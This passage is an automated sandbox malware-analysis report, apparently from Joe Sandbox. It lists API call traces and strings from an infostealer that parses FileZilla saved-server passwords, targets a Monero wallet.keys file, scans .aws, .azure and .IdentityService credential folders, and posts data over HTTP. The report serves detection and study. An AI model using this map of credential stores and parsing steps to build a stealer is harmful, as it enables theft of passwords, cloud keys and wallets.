                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4779aaf29a2a67dbf85f539d243007edd3bcab67584fbef789ba48e55db114c1
                        • Instruction ID: a940c4b1c815707bb7427c240e4c4bce92b3f5a46fc0d8193bad86e3828eb389
                        • Opcode Fuzzy Hash: 4779aaf29a2a67dbf85f539d243007edd3bcab67584fbef789ba48e55db114c1
                        • Instruction Fuzzy Hash: DD61F3B3A0C7149FE309AE29DC8576AF7E6EFC4320F17893DD6C487744EA3548418A96
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba0b087c21735805ba17008e519b36369e74906459be8726d2fa0da6988b64fa
                        • Instruction ID: cdab9998adbb676aa54dcf1404a54c2fddcac8a802a19b12ce6be1943640c66c
                        • Opcode Fuzzy Hash: ba0b087c21735805ba17008e519b36369e74906459be8726d2fa0da6988b64fa
                        • Instruction Fuzzy Hash: 15512BF3E082109BE718AE69DC9572AB7D5EF94320F1B493EDAC9D7380E579480587C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4441156e37c01fe52a475e41c9f7adf2a2018f5f52e3f1061831859aa5589378
                        • Instruction ID: 3771aa62d0712a1e79ba9bf754864231dc8e7328fb55c2941c374e8e7d863bdf
                        • Opcode Fuzzy Hash: 4441156e37c01fe52a475e41c9f7adf2a2018f5f52e3f1061831859aa5589378
                        • Instruction Fuzzy Hash: E64166F3E181145BE3189D2CEC8475AB7DAEBA4620F2B453DDA89E3744E8796C0183C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eaf9efda7d1c1dc98a6c752829d21a90d3e151df6a7b04e7dc134531d63621ff
                        • Instruction ID: 9401c25d7126507f454f8e4c5e1666b6f64efe68a8b93f6b7a9170e515af7872
                        • Opcode Fuzzy Hash: eaf9efda7d1c1dc98a6c752829d21a90d3e151df6a7b04e7dc134531d63621ff
                        • Instruction Fuzzy Hash: C14157F39082149BF3146E29CC4477AB7D6EF90720F2B453DDAD593780EA3919058796
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ce5056be54e199d24b73b9e98b3b1840685c183105ec34dee7633fd20f5c9c8
                        • Instruction ID: 181ffdf65ad595e6fc7f0304db12348b091f5ed1a2a5492dd9e56b5e32ad7890
                        • Opcode Fuzzy Hash: 4ce5056be54e199d24b73b9e98b3b1840685c183105ec34dee7633fd20f5c9c8
                        • Instruction Fuzzy Hash: 5031D2B220C7089FD314AF59DCC266AF7E9EF98310F56892DD7D083340E675A815CA5A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00280DBA,00280DB7,00280DB6,00280DB3), ref: 00270362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00270369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00270385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 002703CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 002703DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00270419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00270463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 0027051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 00270532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 0027054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00270562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00270571
                        • lstrcat.KERNEL32(?,url: ), ref: 00270580
                        • lstrcat.KERNEL32(?,00000000), ref: 00270593
                        • lstrcat.KERNEL32(?,00281678), ref: 002705A2
                        • lstrcat.KERNEL32(?,00000000), ref: 002705B5
                        • lstrcat.KERNEL32(?,0028167C), ref: 002705C4
                        • lstrcat.KERNEL32(?,login: ), ref: 002705D3
                        • lstrcat.KERNEL32(?,00000000), ref: 002705E6
                        • lstrcat.KERNEL32(?,00281688), ref: 002705F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00270604
                        • lstrcat.KERNEL32(?,00000000), ref: 00270617
                        • lstrcat.KERNEL32(?,00281698), ref: 00270626
                        • lstrcat.KERNEL32(?,0028169C), ref: 00270635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00280DB2), ref: 0027068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 37033d0e51da534bb05f289ddeeb86be5114c38812d8213899f275a1eed980ad
                        • Instruction ID: 441775c95aaa8f27a3db7fe50adea81437ae60999ef45d7d00ae15c49e95068e
                        • Opcode Fuzzy Hash: 37033d0e51da534bb05f289ddeeb86be5114c38812d8213899f275a1eed980ad
                        • Instruction Fuzzy Hash: 3DD13E759201089BCB04FBF4DD96DEE773CAF55310F408528F106A6091EF34AA6ACF66
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                          • Part of subcall function 002647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002659F8
                        • StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00265A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00265B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E2EA08,00000000,?,00E2A1C0,00000000,?,00281A1C), ref: 00265E71
                        • lstrlen.KERNEL32(00000000), ref: 00265E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00265E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00265E9A
                        • lstrlen.KERNEL32(00000000), ref: 00265EAF
                        • lstrlen.KERNEL32(00000000), ref: 00265ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00265EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00265F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00265F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00265F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00265FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00265FBD
                        • HttpOpenRequestA.WININET(00000000,00E2E9C8,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00265BF8
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • InternetCloseHandle.WININET(00000000), ref: 00265FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------$8$x
                        • API String ID: 874700897-3110365316
                        • Opcode ID: 3ad655afa3db347b3b94e09e5f3e3e982af9b56ba70aacef1a0cf711312b236e
                        • Instruction ID: 6a34cda878386f82e9395bd93df5174f7aef94ac5456b950b55a5e688df6e2ac
                        • Opcode Fuzzy Hash: 3ad655afa3db347b3b94e09e5f3e3e982af9b56ba70aacef1a0cf711312b236e
                        • Instruction Fuzzy Hash: 78122171830118ABDB15EBA0DC96FEEB378BF54710F5081A9F11A62091DF702A69CF66
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0026CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0026D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0026D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D208
                        • lstrcat.KERNEL32(?,00281478), ref: 0026D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D22A
                        • lstrcat.KERNEL32(?,0028147C), ref: 0026D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D24C
                        • lstrcat.KERNEL32(?,00281480), ref: 0026D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D26E
                        • lstrcat.KERNEL32(?,00281484), ref: 0026D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D290
                        • lstrcat.KERNEL32(?,00281488), ref: 0026D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D2B2
                        • lstrcat.KERNEL32(?,0028148C), ref: 0026D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0026D2D4
                        • lstrcat.KERNEL32(?,00281490), ref: 0026D2E3
                          • Part of subcall function 0027A820: lstrlen.KERNEL32(00264F05,?,?,00264F05,00280DDE), ref: 0027A82B
                          • Part of subcall function 0027A820: lstrcpy.KERNEL32(00280DDE,00000000), ref: 0027A885
                        • lstrlen.KERNEL32(?), ref: 0026D32A
                        • lstrlen.KERNEL32(?), ref: 0026D339
                          • Part of subcall function 0027AA70: StrCmpCA.SHLWAPI(00E29100,0026A7A7,?,0026A7A7,00E29100), ref: 0027AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0026D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: e43be1fedfdd26bef72541932365485ee9eb368f6574b0b047c75aa309fe1a6e
                        • Instruction ID: b332d411a6d585d1229279f7d7a20f1621e41bc972f8290c8653f6a24e75f0d8
                        • Opcode Fuzzy Hash: e43be1fedfdd26bef72541932365485ee9eb368f6574b0b047c75aa309fe1a6e
                        • Instruction Fuzzy Hash: B0E10F71920108ABCB04FBA0DD96EEE7778AF55311F508168F10BA6091DF35AE26CF67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID: $8$P$
                        • API String ID: 2001356338-1949458441
                        • Opcode ID: 1a0f43f41f270ac214b25b65e24aea44495f135c3c47f98cdf1cff69c39f6544
                        • Instruction ID: 76558569fb4042f1185893ca954b9d81664fc43cde9d7411ac8067c16c878505
                        • Opcode Fuzzy Hash: 1a0f43f41f270ac214b25b65e24aea44495f135c3c47f98cdf1cff69c39f6544
                        • Instruction Fuzzy Hash: E4C174B59502199BCB14EF60DC89FEE7778BF94304F0085A8F50EA7241DB70AAA5CF91
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • RegOpenKeyExA.ADVAPI32(00000000,00E2B038,00000000,00020019,00000000,002805B6), ref: 002783A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00278426
                        • wsprintfA.USER32 ref: 00278459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0027847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0027848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00278499
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$0$?
                        • API String ID: 3246050789-3244362230
                        • Opcode ID: 5482b117ba971a5fe6960481aae44b88e212097db4c87186bcbd3cc8cdf52b28
                        • Instruction ID: 9c32f5e7279287270ba018ac0ffe60d3af933d6499adf44ec90691c61c5bea9d
                        • Opcode Fuzzy Hash: 5482b117ba971a5fe6960481aae44b88e212097db4c87186bcbd3cc8cdf52b28
                        • Instruction Fuzzy Hash: 92813F71921118ABDB64DF54CC95FEEB7B8BF48710F00C298E10AA6180DF706B99CF95
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E2D558,00000000,?,0028144C,00000000,?,?), ref: 0026CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0026CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0026CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0026CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0026CAD9
                        • StrStrA.SHLWAPI(?,00E2D3C0,00280B52), ref: 0026CAF7
                        • StrStrA.SHLWAPI(00000000,00E2D3F0), ref: 0026CB1E
                        • StrStrA.SHLWAPI(?,00E2DBF0,00000000,?,00281458,00000000,?,00000000,00000000,?,00E29030,00000000,?,00281454,00000000,?), ref: 0026CCA2
                        • StrStrA.SHLWAPI(00000000,00E2DCF0), ref: 0026CCB9
                          • Part of subcall function 0026C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0026C871
                          • Part of subcall function 0026C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0026C87C
                        • StrStrA.SHLWAPI(?,00E2DCF0,00000000,?,0028145C,00000000,?,00000000,00E29040), ref: 0026CD5A
                        • StrStrA.SHLWAPI(00000000,00E28EF0), ref: 0026CD71
                          • Part of subcall function 0026C820: lstrcat.KERNEL32(?,00280B46), ref: 0026C943
                          • Part of subcall function 0026C820: lstrcat.KERNEL32(?,00280B47), ref: 0026C957
                          • Part of subcall function 0026C820: lstrcat.KERNEL32(?,00280B4E), ref: 0026C978
                        • lstrlen.KERNEL32(00000000), ref: 0026CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0026CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: ed9cacaeb2e15ad84cbb0262a1abe6bf88f481fa18329a71b89d3a8a96f11aa7
                        • Instruction ID: 3996998d872b7752b93f8256e107c9efc68cb36b3d4e03083262984ace69286f
                        • Opcode Fuzzy Hash: ed9cacaeb2e15ad84cbb0262a1abe6bf88f481fa18329a71b89d3a8a96f11aa7
                        • Instruction Fuzzy Hash: C2E12171C20108ABDB15EBA0DC96FEFB778AF54310F408169F11A67191DF306A6ACF66
                        APIs
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00274DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00274DCD
                          • Part of subcall function 00274910: wsprintfA.USER32 ref: 0027492C
                          • Part of subcall function 00274910: FindFirstFileA.KERNEL32(?,?), ref: 00274943
                        • lstrcat.KERNEL32(?,00000000), ref: 00274E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00274E59
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,00280FDC), ref: 00274971
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,00280FE0), ref: 00274987
                          • Part of subcall function 00274910: FindNextFileA.KERNEL32(000000FF,?), ref: 00274B7D
                          • Part of subcall function 00274910: FindClose.KERNEL32(000000FF), ref: 00274B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00274EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00274EE5
                          • Part of subcall function 00274910: wsprintfA.USER32 ref: 002749B0
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,002808D2), ref: 002749C5
                          • Part of subcall function 00274910: wsprintfA.USER32 ref: 002749E2
                          • Part of subcall function 00274910: PathMatchSpecA.SHLWAPI(?,?), ref: 00274A1E
                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,00E2E928), ref: 00274A4A
                          • Part of subcall function 00274910: lstrcat.KERNEL32(?,00280FF8), ref: 00274A5C
